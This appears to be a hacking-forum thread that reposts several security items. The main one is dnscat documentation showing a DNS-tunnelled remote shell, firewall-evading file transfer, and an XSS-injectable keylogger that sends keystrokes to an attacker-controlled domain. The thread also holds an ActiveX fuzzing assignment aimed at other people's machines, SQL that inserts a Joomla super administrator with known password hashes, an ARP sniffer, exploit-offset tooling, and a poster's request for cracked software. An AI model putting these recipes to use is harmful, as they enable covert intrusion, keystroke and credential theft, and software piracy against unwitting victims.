begood

Ratio: 41.570 Uploaded: 13.90 TB Downloaded: 334.37 GB cat ati da pe asta ?

Intro dnscat is designed in the spirit of netcat, allowing two hosts over the Internet to talk to each other. The major difference between dnscat and netcat, however, is that dnscat routes all traffic through the local (or a chosen) DNS server. This has several major advantages: * Bypasses pretty much all network firewalls * Bypasses many local firewalls * Doesn't pass through the typical gateway/proxy and therefore is stealthy There are a lot of advantages to using the DNS protocol. There are, of course, several disadvantages as well: * Data has to be encoded into alpha-numeric (DNS allows letters (not case sensitive) and numbers) * DNS is slow -- it's not a direct connection * The possibility of annoying DNS providers with the amount of traffic being sent through them * dnscat requires the listener to be an authoritative DNS server The last point is very important. To actually receive DNS traffic, you require either: 1. An authoritative nameserver, preferably one that isn't being used for anything else. This is what I'll be assuming for the rest of the documentation (see the next section for far more information) 2. The ability to connect to the dnscat server on udp/53 from the client (use the --dns flag to set the address) -- this is far less interesting, but will be faster if it works One of the key netcat-like components of dnscat is the -e (or --exec) argument, which runs a program (such as /bin/sh or cmd.exe) and redirects its input and output through the connection. The --exec flag can be used on the client or server. dnscat has been tested on, in alphabetical order: * FreeBSD 7.2 * FreeBSD 8.0 * FreeBSD 8.0 amd4 * Mac OS X 10.4 (I think) * Slackware 13 * Slackware 13-64 * Windows 2000 * Windows 2003 * Windows XP It should work on any modern version of Linux, FreeBSD, or Windows. To start a dnscat server, use the following command line: dnscat --listen To start a dnscat client, use this command line: dnscat --domain <domain> For example: dnscat --domain skullseclabs.org You can also specify the DNS server to use, if the correct one wasn't chosen by using the --dns argument or if you don't have an authoritative nameserver and you want to make a direct UDP/53 connection: dnscat --domain skullseclabs.org --dns 4.2.2.1 Remember that the server has to be the authoritative nameserver for the domain given by the client, unless the --dns entry points directly to the dnscat server. For more options, use --help: dnscat --help Remote shell Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before: dnscat --listen And run the shell on the client side: Linux/BSD: dnscat --domain skullseclabs.org --exec "/bin/sh" Windows: dnscat.exe --domain skullseclabs.org --exec "cmd.exe" On the server, you can now type commands and they'll run on the client side. Transfer a file You can transfer a file to the client from the server like this: Server: dnscat --listen > file.out Client: dnscat --domain <domain> < file.in You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this: Server: dnscat --listen < file.in Client: dnscat --domain <domain> > file.out A couple things to note: * No integrity checking is performed * There is currently no indication when a transfer is finished Tunnel another connection This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version. Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver. A diagram might help: ssh client | | (port 1234 via netcat) | v dnscat server ^ | | (DNS server(s)) | dnscat client | | (port 22 via netcat) | v ssh server It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. First, we start the netcat server. The server is going to run netcat, which listens on port 1234: dnscat --listen --exec "nc -l -p 1234" If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client. Second, on the client side, dnscat connects to 192.168.2.100 port 22: dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22" This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234. Third and finally, we ssh to our socket: ssh -p 1234 ron@127.0.0.1 One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool! Web keylogger There is an implementation of dnscat in Javascript (jsdnscat) written by Stefan Penner. It's located in the 'samples' folder of nbtool and conists of two libraries, one for keylogging and the other for dnscat. There are several example HTML files for using these, but it really comes down to these lines: <script type='text/javascript' src='js/skullsecurity.all.min.js'></script> <script type='text/javascript'> SkullSecurity.jsdnscat.config.host = 'yourdomain.com'; SkullSecurity.keylogger.start(SkullSecurity.jsdnscat.send); </script> Equivalent code can easily be put into a .js file and hosted on your server for easy use with cross-site scripting. The best reason for using this as opposed to traditional avenues for data exfiltration is to get around logging and firewalls -- because dnscat will respond with a localhost record to all A and AAAA requests, the computer doesn't actually send an HTTP request to the network, yet you still get its data. Dnscat - Skull Security download : Dnscat - Skull Security jsdnscat : http://svn.skullsecurity.org:81/ron/security/nbtool-0.04/samples/jsdnscat/

e pe bune.

de ce nu urcati voi pe un free host programele shareware (mentionate mai sus)+ serial/crack ?

source : Independent testing, rating and review of monitoring software (keylogger/spyware) 2010

Google Translate source : http://www.mindterra.com/blog/?p=112

Mike Zusman explains fuzz testing, a special type of negative software testing. Homework Your assignment for this section is the following: 1. Locate a stack overflow in an ActiveX control by fuzzing it. Choose your target machine carefully. If you run a clean and patched Windows box, you might have a harder time finding something exploitable. See if you can run your tools on someone else's machine - preferably a machine with a lot of garbage software installed on it. COMRaider will more easily find the low-hanging fruit - the basic stack smash - and you should probably run this tool first. If you find nothing, run other fuzzers like Dranzer, AxRub, or AxMan. 2. Determine the exploitability of the overflow by investigating the stack with a debugger. COMraider will show you debugger output in its own GUI. Double clicking on the exceptions will show a stack dump. AxMan will require use of an external debugger of your choosing. You get extra points if you use WinDBG and run the !exploitable plugin. 3. Reproduce the successful fuzz in a "Proof of Concept" that overwrites EIP with all A's. Even though COMraider might show EIP over written, we still want to see a stand-alone script that demonstrates the vulnerability in a web browser. Additionally, you should identify the vulnerable DLL on the machine and grab a copy of it. This will be important if you are not testing on your own machine - you will want to take the DLL with you for further testing. For more information on registering DLLs on a Windows box, check out the Regsvr32 documentation. What to hand in: One DLL, a PoC that crashes the DLL, a screenshot of the crash in a debugger. Goals The goal of the assignment is to introduce you to fuzzing and client-side attacks, not to develop working exploits against ActiveX objects. To that end, make sure that your homework demonstrates that you: * know how to operate a fuzzer (step 1) * know how to identify a successful fuzz (step 2) * know how to reproduce a successful fuzz (step 3) * are comfortable working with client-side "stuff" (in this case, ActiveX) That's it! Walkthrough If you want a simple walkthrough before starting the assignment or if you've tried the assignment and can't find a vulnerable ActiveX, you can register the ActiveX included in this zip file which I guarantee is loaded with exploitable vulnerabilities. To make things simple, just register it and then point COMRaider directly at it. The vulnerable function is foobar() and pretty much anything it accepts will generate a stack overflow. If you don't see "ACCESS VIOLATION", you're doing something wrong. If you see error messages saying "Cannot Create Object", you have not registered the DLL correctly. If you're still having problems finding an ActiveX to fuzz, try some of these: * ActiveX 1 * ActiveX 2 * ActiveX 3 Reading Material * Information on ActiveX * Fuzzing Software * Registering COM DLL's * Jared DeMott - The Evolving Art of Fuzzing (whitepaper) (slides) video&source: Penetration Testing and Vulnerability Analysis - Fuzzing - Fuzzing101

Normally, you can add, edit and delete users and passwords from the back-end User Manager. To do this, you must be logged in as a member of the Super Administrator group. In some situations, this may not be possible. For example, your site may have been "hacked" and had the passwords or users changed. Or perhaps the person who knew the passwords is no longer available. Or maybe you have forgotten the password that was used. In these cases, it is still possible to fix up the Joomla! database so you can log back in as a Super Administrator. There are three possible methods discussed below. Use the Lost Password Feature If you have access to the email address that was used for the admin user, and you have made the "lost password" feature available on the front end, the simplest thing is to do is to use the "lost password" Front-end function. The site will send an e-mail to the user's e-mail address and allow you to change the password. If this method will not work, you have two other options, both of which require working with the MySQL database directly. Change the Password in the Database If the admin user is still defined, the simplest option is to change the password in the database to a known value. This requires that you have access to the MySQL database using phpMyAdmin. 1. Navigate to phpMyAdmin and select the database for the Joomla! site in the left-hand drop-down list box. This will show the database tables on the left side of the screen. 2. Click on the table "jos_users" in the list of tables. 3. Click on the "Browse" button in the top toolbar. This will show all of the users that are set up for this site. 4. Find the user whose password you want to change and press the Edit icon for this row. 5. A form will display that allows you to edit the password field. Copy the value d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 5. into the password field and press the Go button. phpMyAdmin should display the message "Affected rows: 1". At this point, the password should be changed to "secret". 6. Log in with this user and password and change the password of this user to a secure value. Check all of the users using the User Manager to make sure they are legitimate. If you have been hacked, you may want to change all of the passwords on the site. Add a New Super Administrator User If changing the password won't work, or you aren't sure which user is a member of the Super Administrator group, you can use this method to create a new user. 1. Navigate to phpMyAdmin and select the database for the Joomla! site in the left-hand drop-down list box. This will show the database tables on the left side of the screen. 2. Press the "SQL" button in the toolbar to run a SQL query on the selected database. This will display a field called "Run SQL query/queries on database <your database>". 3. Delete any text in this field and paste in the following and press the Go button. INSERT INTO `jos_users` (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`, `sendEmail`, `gid`, `registerDate`, `lastvisitDate`) VALUES (NULL, 'Administrator2', 'admin2', 'your-email@yourdomain.com', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', 'Super Administrator', 0, 1, 25, '0000-00-00 00:00:00', '0000-00-00 00:00:00'); INSERT INTO `jos_core_acl_aro` VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'Administrator', 0); INSERT INTO `jos_core_acl_groups_aro_map` VALUES (25, '', LAST_INSERT_ID()); At this point, you should be able to log into the back end of Joomla! with the username of "admin2" and password of "secret". After logging in, go to the User Manager and change the password to a secure value and the e-mail to a valid e-mail address. If there is a chance you have been "hacked", be sure to check that all users are legitimate, especially any members of the Super Administrator group. The examples above change the password to "secret". Two other possible values are shown below: - password = "this is the MD5 and salted hashed password" ------------------------------------------------------ - admin = 433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT - secret = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 - OU812 = 5e3128b27a2c1f8eb53689f511c4ca9e:J584KAEv9d8VKwRGhb8ve7GdKoG7isMm

So, you have a nice shiny DVD with your favorite movie, and your dog chews it to pieces. If only you had ripped that movie to a file that you could burn to a new DVD, or play on your favorite media player. In this video tutorial I show those of you outside of the United States** how to do this in Linux. First we need to install several libraries, including libdvdcss2 (for help installing this see my previous video here). Then we install a DVD ripper (I chose Thoggen because it is quick and easy). And that’s it, you can rip away to your heart’s content! Thoggen: thoggen - DVD backup/ripping with style HandbrakeGTK: HandBrake The DVD ripping program I chose was Thoggen for its ease of use and simplicity. It automatically rips the DVD to .OGM (Ogg media) format. VLC and other media players should be able to play this without a problem, but if you need help installing codecs install ffmpeg (see my video here where I explain it) as it contains a whole codec library. Other DVD ripping programs can save to other formats, so feel free to install and use the ripper of your choice. video : Howto Rip a DVD - Easy and Free with Linux | LinuxHaxor.net

ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address). 18ae58b999b218c41f4714dc43037caf /*************************************************************************** * Copyright (C) 2010 by Velan. * * vlabs.c@gmail.com * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * * This program is distributed in the hope that it will be useful, * * but WITHOUT ANY WARRANTY; without even the implied warranty of * * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * * GNU General Public License for more details. * * * * You should have received a copy of the GNU General Public License * * along with this program; if not, write to the * * Free Software Foundation, Inc., * * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * ***************************************************************************/ // 0.0.5 - included ethernet header, modified ARP header, changing APR processing by including ntohs; etc // dependencies - libpcap -> tcpdump.org // compilation - g++ arp_sniff.cc -o arp_sniff -lpcap -w #ifdef HAVE_CONFIG_H #include <config.h> #endif //#include <iostream> //#include <cstdlib> #include <stdio.h> #include <stdlib.h> #include <string.h> //#include <features.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netinet/tcp.h> #include <pcap.h> using namespace std; void List_Devices(); void Sniff_Device(char *Device); void Got_ARP_Packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet); // Ethernet header typedef u_int32_t tcp_seq; main(int argc, char *argv[]) { //printf("Shellcode detector. \n"); char *ArgDevice; ArgDevice = (char*)malloc(256); bzero(ArgDevice, 256); printf("Sniffer Lite. by Velan. vlabs.c@gmail.com\nThis module contains the ARPSniffer.\n"); if(argc < 2) { printf("\nUsage: %s [ld] [device name]\narg\t\tfunction\n", argv[0]); printf("-l\t\tlisting available devices\n"); printf("-d\t\tuse default device\n"); printf("\n"); exit(0); } else if(strncmp(argv[1], "-l", 2) == 0) { List_Devices(); } else if(strncmp(argv[1], "-d", 2) == 0) { printf("Selecting default device. "); snprintf(ArgDevice, 3, "%s", "-d"); Sniff_Device(ArgDevice); } else if(argc == 2 && strncmp(argv[1], "-l", 2) != 0 && strncmp(argv[1], "-d", 2) != 0) { snprintf(ArgDevice, 256, "%s", argv[1]); Sniff_Device(ArgDevice); } } void List_Devices() { pcap_if_t *All_Devices_SP, *d; int ret = 0; char pcap_errbuf[PCAP_ERRBUF_SIZE]; printf("Listing available devices.\n"); ret = pcap_findalldevs(&All_Devices_SP, pcap_errbuf); if(ret == -1) { printf("Error in looking up all available devices. %s\n", pcap_errbuf); exit(-1); } printf("\n----------------------------\nDevice\t\tDescription\n----------------------------\n"); for(d = All_Devices_SP; d; d = d->next) { printf("%s\t\t%s\n", d->name, d->description); } printf("\n"); exit(0); } void Sniff_Device(char *Device) { char *dev = NULL; char pcap_errbuf[PCAP_ERRBUF_SIZE]; const u_char *packet = NULL; int ret = 0, i = 0; unsigned int ts = 0; pcap_t *pcap_handle; bpf_u_int32 pcap_device_mask; bpf_u_int32 pcap_device_ip; struct pcap_pkthdr header; struct bpf_program filter; dev = (char*) malloc(256); if(strncmp(Device, "-d", 2) == 0) { dev = pcap_lookupdev(pcap_errbuf); printf("Default device: %s, ", dev); } else { snprintf(dev, 256, "%s", Device); } if(dev == NULL) { printf("Error in looking up default device. %s\n", pcap_errbuf); exit(0); } ret = pcap_lookupnet(dev, &pcap_device_ip, &pcap_device_mask, pcap_errbuf); if(ret == -1) { printf("Error in lookup device. %s\n", pcap_errbuf); exit(0); } printf("opening the device %s for sniffing\n", dev); // print sniffing IP - start ts = pcap_device_ip; ts = (ts << 24) >> 24; printf("Sniffing device IP: %u.", ts); ts = pcap_device_ip; ts = (ts << 16) >> 24; printf("%u.", ts); ts = pcap_device_ip; ts = (ts << 8) >> 24; printf("%u.", ts); ts = pcap_device_ip; ts = (ts >> 24); printf("%u, ", ts); // print sniffing IP - end // print sniffing IP Mask - start ts = pcap_device_mask; ts = (ts << 24) >> 24; printf("Mask: %u.", ts); ts = pcap_device_mask; ts = (ts << 16) >> 24; printf("%u.", ts); ts = pcap_device_mask; ts = (ts << 8) >> 24; printf("%u.", ts); ts = pcap_device_mask; ts = (ts >> 24); printf("%u\n", ts); // print sniffing IP Mask - end printf("\n\n"); pcap_handle = pcap_open_live(dev, 1000, 0, 10000, pcap_errbuf); if(pcap_handle == NULL){ printf("Error!\n"); } pcap_compile(pcap_handle, &filter, "arp", 1, pcap_device_mask); // create filter to grab only ARP pcap_setfilter(pcap_handle, &filter); // apply the filter to the handle printf("______________________________________________________\n\n"); pcap_loop(pcap_handle, -1, Got_ARP_Packet, NULL); // -1 means unlimited packet } void Got_ARP_Packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) { typedef struct EthernetHeader_StructMain{ u_char DestinationMACAddress[6]; u_char SourceMACAddress[6]; u_short Type; }Struct_EthernetHeader; // 14 bytes typedef struct ARPHeader_StructMain{ u_int16_t HardwareType; // hardware type u_int16_t ProtocolType; // protocol type u_char HardwareAddressLength; // harware address length u_char ProtocolAddressLength; // protocol address length u_int16_t Opcode; // opcode - request, reply, re request u_char SourceHardwareAddress[6]; // source MAC address u_char SourceProtocolAddress[4]; // source IP address u_char DestinationHardwareAddress[6]; // target MAC address u_char DestinationProtocolAddress[4]; // target IP address }Struct_ARPHeader; // 28 bytes unsigned int ts = 0, j = 0 ; u_int16_t HardwareType_Host = 0, ProtocolType_Host = 0, Opcode_Host = 0; u_char HardwareAddressLength_Host = 0, ProtocolAddressLength_Host = 0; Struct_EthernetHeader *EthernetHeader = NULL; Struct_ARPHeader *ARPHeader = NULL; bzero(&EthernetHeader, sizeof(Struct_EthernetHeader)); bzero(&ARPHeader, sizeof(Struct_ARPHeader)); EthernetHeader = (Struct_EthernetHeader *) packet; ARPHeader = (Struct_ARPHeader *) (packet+14); HardwareType_Host = ntohs(ARPHeader->HardwareType); ProtocolType_Host = ntohs(ARPHeader->ProtocolType); Opcode_Host = ntohs(ARPHeader->Opcode); HardwareAddressLength_Host = ARPHeader->HardwareAddressLength; ProtocolAddressLength_Host = ARPHeader->ProtocolAddressLength; // print Ethernet header - 14 bytes - start printf("Ethernet packet - Frame II: "); // print source MAC address for(j = 0; j < 6; j++) { //printf("(%u, %02X)", ARPHeader->SourceHardwareAddress[j], ARPHeader->SourceHardwareAddress[j]); printf("%02X", EthernetHeader->SourceMACAddress[j]); if(j != 5){ printf(":"); } } printf(" > "); // print destination MAC address for(j = 0; j < 6; j++) { //printf("(%u, %02X)", ARPHeader->SourceHardwareAddress[j], ARPHeader->SourceHardwareAddress[j]); printf("%02X", EthernetHeader->DestinationMACAddress[j]); if(j != 5){ printf(":"); } } // print Ethernet type printf(", Type: 0x%X", ntohs(EthernetHeader->Type)); // print Ethernet header - 14 bytes - end printf("\n"); // print ARP header - 28 bytes - start printf("ARP Header: "); // print source ip address for(j = 0; j < 4; j++) { printf("%d", ARPHeader->SourceProtocolAddress[j]); if(j != 3){ printf("."); } } printf(" > "); // print target ip address for(j = 0; j < 4; j++) { printf("%d", ARPHeader->DestinationProtocolAddress[j]); if(j != 3){ printf("."); } } printf("\t\t=\t"); //printf("\n\t\t"); printf("MAC: "); // print source hardware address for(j = 0; j < 6; j++) { //printf("(%u, %02X)", ARPHeader->SourceHardwareAddress[j], ARPHeader->SourceHardwareAddress[j]); printf("%02X", ARPHeader->SourceHardwareAddress[j]); if(j != 5){ printf(":"); } } printf(" > "); // print target hardware address for(j = 0; j < 6; j++) { printf("%02X", ARPHeader->DestinationHardwareAddress[j]); if(j != 5){ printf(":"); } } printf("\n\t\t"); //print hardware type - start printf("Hardware type: "); if(HardwareType_Host == 0) { printf("Reserved"); } else if(HardwareType_Host == 1) { printf("Ethernet"); } else if(HardwareType_Host == 2) { printf("Experimental Ethernet"); } else if(HardwareType_Host == 3) { printf("Amateur Radio AX25"); } else if(HardwareType_Host == 4) { printf("Proteon ProNET Token Ring"); } else if(HardwareType_Host == 5) { printf("Chaos"); } else if(HardwareType_Host == 6) { printf("IEEE 802"); } else if(HardwareType_Host == 7) { printf("ARCNET"); } else if(HardwareType_Host == 8) { printf("Hyperchannel"); } else if(HardwareType_Host == 9) { printf("Lanstar"); } else if(HardwareType_Host == 10) { printf("Atuonet Short Address"); } else if(HardwareType_Host == 11) { printf("LocalTalk"); } else if(HardwareType_Host == 12) { printf("LocalNet (IBM PCNet or SYTEK LocalNET)"); } else if(HardwareType_Host == 13) { printf("Ultra link"); } else if(HardwareType_Host == 14) { printf("SMDS"); } else if(HardwareType_Host == 15) { printf("Frame Relay"); } else if(HardwareType_Host == 16) { printf("ATM, Asynchronous Transmission Mode"); } else if(HardwareType_Host == 17) { printf("HDLC"); } else if(HardwareType_Host == 18) { printf("Fibre Channel"); } else if(HardwareType_Host == 19) { printf("ATM, Asynchronous Transmission Mode"); } else if(HardwareType_Host == 20) { printf("Serial Line"); } else if(HardwareType_Host == 21) { printf("ATM, Asynchronous Transmission Mode"); } else if(HardwareType_Host == 22) { printf("MIL-STD-188-220"); } else if(HardwareType_Host == 23) { printf("Metricom"); } else if(HardwareType_Host == 24) { printf("IEEE 1394.1995"); } else if(HardwareType_Host == 25) { printf("MAPOS"); } else if(HardwareType_Host == 26) { printf("Twinazial"); } else if(HardwareType_Host == 27) { printf("EUI-64"); } else if(HardwareType_Host == 28) { printf("HIPARP"); } else if(HardwareType_Host == 29) { printf("IP and ARP over ISO 7816-3"); } else if(HardwareType_Host == 30) { printf("ARPSec"); } else if(HardwareType_Host == 31) { printf("IPsec tunnel"); } else if(HardwareType_Host == 32) { printf("Infiniband"); } else if(HardwareType_Host == 33) { printf("CAI, TIA-102 Project 25 Common Air Interface"); } else if(HardwareType_Host == 34) { printf("Wiegand Interface"); } else if(HardwareType_Host == 35) { printf("Pure IP"); } else if(HardwareType_Host == 36) { printf("HW_EXP1"); } else if(HardwareType_Host > 36 && HardwareType_Host <256) { printf("Unknown"); } else if(HardwareType_Host == 256) { printf("HW_EXP2"); } else if(HardwareType_Host > 256 && HardwareType_Host <65535) { printf("Unknown"); } else if(HardwareType_Host == 65535) { printf("Reserved"); } printf(" (0x%X)", HardwareType_Host); // print hardware type - end // print protocol type - start printf(", "); printf("Protocol: "); if(ProtocolType_Host == 0x0800) // 0x0800 - IP { printf("IP "); } printf(" (0x%X)", ProtocolType_Host); // print protocol type - end // print opcode type - start printf(", "); printf("Opcode: "); if(Opcode_Host == 0) { printf("Reserved"); } else if(Opcode_Host == 1) { printf("Request"); } else if(Opcode_Host == 2) { printf("Reply"); } else if(Opcode_Host == 3) { printf("Request Reverse"); } else if(Opcode_Host == 4) { printf("Reply Reverse"); } else if(Opcode_Host == 5) { printf("DRARP Request"); } else if(Opcode_Host == 6) { printf("DRARP Reply"); } else if(Opcode_Host == 7) { printf("DRARP Error"); } else if(Opcode_Host == 8) { printf("InARP Request"); } else if(Opcode_Host == 9) { printf("InARP Reply"); } else if(Opcode_Host == 10) { printf("ARP NAK"); } else if(Opcode_Host == 11) { printf("MARS Request"); } else if(Opcode_Host == 12) { printf("MARS Multi"); } else if(Opcode_Host == 13) { printf("MARS MServ"); } else if(Opcode_Host == 14) { printf("MARS Join"); } else if(Opcode_Host == 15) { printf("MARS Leave"); } else if(Opcode_Host == 16) { printf("MARS NAK"); } else if(Opcode_Host == 17) { printf("MARS Unserv"); } else if(Opcode_Host == 18) { printf("MARS SJoin"); } else if(Opcode_Host == 19) { printf("MARS SLeave"); } else if(Opcode_Host == 20) { printf("MARS Grouplist Reply"); } else if(Opcode_Host == 21) { printf("MARS Grouplist Reply"); } else if(Opcode_Host == 22) { printf("MARS Redirect Map"); } else if(Opcode_Host == 23) { printf("MAPOS UNARP"); } else if(Opcode_Host == 24) { printf("OP_EXP1"); } else if(Opcode_Host == 25) { printf("OP_EXP2"); } else if(Opcode_Host > 25 && Opcode_Host < 65535) { printf("Unknown"); } else if(Opcode_Host == 65535) { printf("Unknown"); } printf(" (0x%X)", Opcode_Host); // print opcode type - end printf("\n\t\t"); // print hardware address length and protocol address length - start printf("Hardware address length: %u, Protocol address length: %u", HardwareAddressLength_Host, ProtocolAddressLength_Host); // print hardware address length and protocol address length - end printf("\n\t\t"); // print hardware vendor name - start // 000000, 000001, 000002, 000003, 000004, 000005, 000006, 000007, 000008, 000009 - XEROX CORPORATION. // 00000C - CISCO SYSTEMS, INC. // 00001A - ADVANCED MICRO DEVICES // 0002B3 - Intel Corporation. // 0001E6 - Hewlett-Packard Company. // 000255 - IBM Corporation // 00065B - Dell Computer Corp. // 000102 - 3COM CORPORATION // 00178D - Checkpoint Systems, Inc. // 000585 - Juniper Networks, Inc. //000569, 000C29, 001C14, 005056 - VMWare Inc. char *MAC_IDs[23] = {"000000", "000001", "000002", "000003", "000004", "000005", "000006", "000007", "000008", "000009", "00000C", "00001A", "0002B3", "0001E6", "000255", "00065B", "000102", "00178D", "000585", "000569", "000C29", "001C14", "005056"}; char *MAC_Vendors[23] = {"XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "CISCO SYSTEMS, INC.", "ADVANCED MICRO DEVICES", "Intel Corporation.", "Hewlett-Packard Company.", "IBM Corporation", "Dell Computer Corp.", "3COM CORPORATION", "Checkpoint Systems, Inc.", "Juniper Networks, Inc.", "VMWare Inc.", "VMWare Inc.", "VMWare Inc.", "VMWare Inc."}; char *MACID; MACID = (char *)malloc(6); sprintf(MACID, "%02X%02X%02X", ARPHeader->SourceHardwareAddress[0], ARPHeader->SourceHardwareAddress[1], ARPHeader->SourceHardwareAddress[2]); printf("Source Ethernet Vendor: "); ts = 0; for(j = 0; j < 23; j++) { if(strncmp(MAC_IDs[j], MACID, 6) == 0) { printf("%s\n", MAC_Vendors[j]); ts = 1; break; } } if(ts == 0) { printf("Unknown. oui id: %s. Refer http://standards.ieee.org/regauth/oui/oui.txt\n", MACID); } // print hardware vendor name - end // print ARP header - 28 bytes - end printf("\n______________________________________________________\n\n"); }

Secpoint has introduced a new "portable penetrator" that offers browser-based wireless vulnerability scanning of large networks across hundreds of IP addresses simultaneously. The out-of-the-box unit is based on a Dell Inspiron Mini 10v netbook with a 10.1" screen, six-hour battery life, 1.6 Ghz Dual core Atom processor and a Linux OS. The Portable Penetrator PP3000 also features a USB wireless adapter antenna that boasts a strength of 8dBi and is capable of cracking security keys encrypted with WEP, WPA or WPA2. "We continue to see, week-after-week, how corporate computers connected to external networks fall foul of various security breaches after their Wi-Fi keys are cracked. Our latest Portable Penetrator identifies all of these danger zones and provides essential advice how to fix the holes," explained Secpoint CEO Victor Christiansenn. "[For example], a Wi-Fi router should, at a bare minimum, be protected by WEP 2.0 with a 25-character password and internal passwords at least 10 characters long, with at least one special character, four numerals, and at least one capital letter; but we never cease to be amazed by the sort of sensitive documents and databases we can access once our Portable Penetrator gets to work on the corporate client networks we're testing." On start-up, the Penetrator provides the names of all identified networks in range, their types of encryption, signal strengths and number of connected users. Users can then launch any number of a wide variety of attacks, including denial of service, against any of detected networks. The Penetrator's attack dictionary currently includes more than 50 languages and runs 250 keys per second across a WPA encrypted network until the network password is identified. Finally, the unit is programmed to identify more than 42,000 remote unique security vulnerabilities and display the tested networks on Google Maps in real-time. video : source : Secpoint cracks WPA keys with Portable Penetrator | TG Daily

While developing exploits, at times you require a unique string for which any 4 consecutive characters selected at an instance are unique across the string(or may be repeated only after a large gap of characters). This is mostly used to find the ‘offset’ of the characters which have over-written the EIP register. Metasploit (version 3.0+) has a tool for both: 1) to generate the string pattern (tools/pattern_create.rb) 2) to find the offset of the required pattern (tools/pattern_offset.rb) These are amazing utilities and really helpful for exploit development. However, the scripts are based on Ruby (in the Metasploit Framework) and it may not be possible for someone to carry the entire MSF. Now people have come up with many alternate solutions and have made their own ports to different scripting languages based on these 2 utilities. I have been getting my hand dirty with Perl for sometime now, and this served as a good project for me to learn Perl. So I have also developed a Perl script which combines these two functionality (i.e. pattern generation and offset search) into one script. The code is available at the end of this post. It’s not a complete port, but it be should be able to do the job most of the time. There are two modes of operation: 1) Only one argument is provided which is the length of the string to be generated (./gspattern.pl [length of string]) 2) Both length of string and pattern whose offset is to be found are provided (./gspattern.pl [length of string] [pattern to search] ) The script can handle multiple occurrences of the pattern (this would happen in cases where the string length is very large) (Let me know if you find any bugs in the code. I am no expert programmer. Just getting my hands dirty in Perl.The script can currently generate strings of length upto 20306 characters.) #!/usr/bin/perl -w use strict; # Generate/Search Pattern (gspattern.pl) v0.1 # Scripted by Wasim Halani (washal) # Visit me at http://securitythoughts.wordpress.com/ # Thanks to hdm and the Metasploit team # Special thanks to Peter Van Eeckhoutte(corelanc0d3r) for his amazing Exploit Development tutorials # This script is to be used for educational purposes only. my $ustart = 65; my $uend = 90; my $lstart = 97; my $lend = 122; my $nstart = 0; my $nend = 9; my $length ; my $string = ""; my ($upper, $lower, $num); my $searchflag = 0; my $searchstring; my $skip='FALSE'; sub credits(){ print "\nGenerate/Search Pattern \n"; print "Scripted by Wasim Halani (washal)\n"; print "http://securitythoughts.wordpress.com/\n"; print "Version 0.1\n\n"; } sub usage(){ credits(); print " Usage: \n"; print " gspattern.pl <length of buffer> \n"; print " Will generate a string of given length. \n"; print "\n"; print " gspattern.pl <length of buffer> <search pattern> \n"; print " Will generate a string of given length,\n"; print " and display the offsets of pattern found.\n"; } sub generate(){ credits(); $length = $ARGV[0]; #print "Generating string for length : " .$length . "\n"; if(length($string) == $length){ finish(); } #looping for the uppercase for($upper = $ustart; $upper <= $uend;$upper++){ $string =$string.chr($upper); if(length($string) == $length){ finish(); } $skip = 'FALSE'; #looping for the lowercase for($lower = $lstart; $lower <= $lend;$lower++){ if(!$skip){ $string =$string.chr($lower); } if(length($string) == $length){ finish(); } #looping for the numeral for($num = $nstart; $num <= $nend;$num++){ $string = $string.$num; if(length($string) == $length){ finish(); } $string = $string.chr($upper); if(length($string) == $length){ finish(); } $string = $string.chr($lower); if(length($string) == $length){ finish(); } $skip = 'TRUE'; } } } } sub search(){ my $offset = index($string,$searchstring); if($offset == -1){ print "Pattern not found\n"; exit(1); } else{ print "Pattern found at offset(s) : "; } my $count = $offset; print $count." "; while($count < $length){ $offset = index($string,$searchstring,$offset+1); if($offset == -1){ print "\n"; exit(1); } print $offset ." "; $count = $count + $offset; } print "\n"; exit(1); } sub finish(){ print "String is : \n".$string ."\n"; if($searchflag){ search(); } exit(1); } if(!$ARGV[0]){ usage(); #print "Going into usage.."; } elsif ($ARGV[1]){ $searchflag = 1; $searchstring = $ARGV[1]; generate(); #print "Going into pattern search..."; } else { generate(); #print "Going into string generation..."; } [Tool] Unique Pattern Generator for Exploit Development Security Thoughts

